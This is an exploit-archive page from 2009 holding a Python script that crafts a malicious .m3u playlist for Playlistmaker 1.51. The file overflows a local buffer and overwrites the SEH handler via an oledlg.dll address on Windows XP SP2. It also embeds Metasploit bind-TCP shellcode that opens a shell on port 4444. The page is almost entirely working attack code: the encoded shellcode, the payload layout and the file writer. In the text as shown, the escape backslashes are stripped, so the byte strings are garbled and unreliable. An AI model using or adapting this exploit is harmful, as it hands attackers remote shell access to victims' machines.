Playlistmaker 1.51 (.m3u File) Local Buffer Overflow Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Playlistmaker 1.51 (.m3u File) Local Buffer Overflow Exploit (SEH)
# Published : 2009-08-18
# Author : Blake
# Previous Title : Xenorate Media Player 2.6.0.0 (.xpl) Universal Local Buffer Exploit (SEH)
# Next Title : VUPlayer <= 2.49 (.m3u File) Universal Buffer Overflow Exploit

# Playlistmaker version 1.51
# Tested on Windows XP SP2 (English)
# Exploit originally discovered by ThE g0bL!N/exploited by germaya_x

# I could not get germaya_x's exploit to work with XP3.
# The only useable p/p/r I could find was in oledlg.dll
# which seems to be compiled with SafeSEH on in XP SP3.
# However, oledlg.dll is useable in XP SP2.


print "n========================"
print "Playlistmaker v1.5 (SEH)"
print "Exploit written by Blake"
print "Discovered by ThE g0bL!N"
print "========================n"

# windows/shell_bind_tcp - 696 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
 
shellcode = ( 
"x89xe2xdbxcexd9x72xf4x58x50x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx42x4ax4ax4bx50x4dx4bx58x4cx39x4bx4fx4b"
"x4fx4bx4fx43x50x4cx4bx42x4cx46x44x47x54x4cx4b"
"x50x45x47x4cx4cx4bx43x4cx44x45x43x48x43x31x4a"
"x4fx4cx4bx50x4fx45x48x4cx4bx51x4fx51x30x43x31"
"x4ax4bx47x39x4cx4bx50x34x4cx4bx45x51x4ax4ex46"
"x51x49x50x4dx49x4ex4cx4cx44x49x50x42x54x43x37"
"x49x51x48x4ax44x4dx45x51x48x42x4ax4bx4cx34x47"
"x4bx46x34x47x54x47x58x43x45x4dx35x4cx4bx51x4f"
"x47x54x45x51x4ax4bx45x36x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx43x31x4ax4bx44x43x46x4cx4cx4b"
"x4cx49x42x4cx47x54x45x4cx43x51x49x53x46x51x49"
"x4bx43x54x4cx4bx51x53x50x30x4cx4bx47x30x44x4c"
"x4cx4bx44x30x45x4cx4ex4dx4cx4bx47x30x45x58x51"
"x4ex42x48x4cx4ex50x4ex44x4ex4ax4cx50x50x4bx4f"
"x49x46x42x46x50x53x42x46x45x38x50x33x50x32x42"
"x48x42x57x43x43x46x52x51x4fx50x54x4bx4fx4ex30"
"x42x48x48x4bx4ax4dx4bx4cx47x4bx50x50x4bx4fx4e"
"x36x51x4fx4dx59x4dx35x45x36x4bx31x4ax4dx44x48"
"x45x52x51x45x42x4ax44x42x4bx4fx4ex30x45x38x48"
"x59x45x59x4cx35x4ex4dx46x37x4bx4fx48x56x51x43"
"x50x53x46x33x46x33x51x43x50x43x51x43x51x53x46"
"x33x4bx4fx4ex30x43x56x43x58x44x51x51x4cx42x46"
"x50x53x4bx39x4bx51x4ax35x42x48x4ex44x45x4ax44"
"x30x49x57x46x37x4bx4fx49x46x42x4ax44x50x46x31"
"x46x35x4bx4fx48x50x45x38x4ex44x4ex4dx46x4ex4b"
"x59x46x37x4bx4fx4ex36x50x53x51x45x4bx4fx4ex30"
"x45x38x4dx35x47x39x4dx56x47x39x50x57x4bx4fx4e"
"x36x50x50x51x44x46x34x50x55x4bx4fx4ex30x4ax33"
"x42x48x4bx57x44x39x48x46x43x49x50x57x4bx4fx49"
"x46x51x45x4bx4fx48x50x43x56x43x5ax42x44x45x36"
"x43x58x43x53x42x4dx4cx49x4bx55x42x4ax50x50x51"
"x49x47x59x48x4cx4dx59x4ax47x43x5ax50x44x4dx59"
"x4dx32x46x51x49x50x4bx43x4ex4ax4bx4ex47x32x46"
"x4dx4bx4ex47x32x46x4cx4dx43x4cx4dx42x5ax47x48"
"x4ex4bx4ex4bx4ex4bx43x58x42x52x4bx4ex48x33x45"
"x46x4bx4fx43x45x50x44x4bx4fx4ex36x51x4bx50x57"
"x50x52x50x51x50x51x46x31x42x4ax45x51x50x51x46"
"x31x46x35x50x51x4bx4fx48x50x45x38x4ex4dx49x49"
"x45x55x48x4ex51x43x4bx4fx4ex36x43x5ax4bx4fx4b"
"x4fx50x37x4bx4fx48x50x4cx4bx46x37x4bx4cx4cx43"
"x48x44x43x54x4bx4fx48x56x46x32x4bx4fx4ex30x43"
"x58x4ax50x4dx5ax44x44x51x4fx46x33x4bx4fx49x46"
"x4bx4fx4ex30x41x41")


#[ Buffer ][ Short Jump ][ P/P/R ][ NOP Sled ][ Shellcode ]
payload = "x41" * 992 # buffer
payload += "xEBx09x90x90" # short jump
payload += "x67x15xd3x74" # overwrites SEH Handler => P/P/R (oledlg.dll) 0x74d31567
payload += "x90" * 20 # NOP Sled
payload += shellcode # shellcode 

print "[+] Creating exploit file"

try:
 file = open("exploit.m3u","w")
 file.write(payload)
 file.close()
 print "[+] Exploit file created"
except:
 print "[x] Error creating file!"

# www.Syue.com [2009-08-18]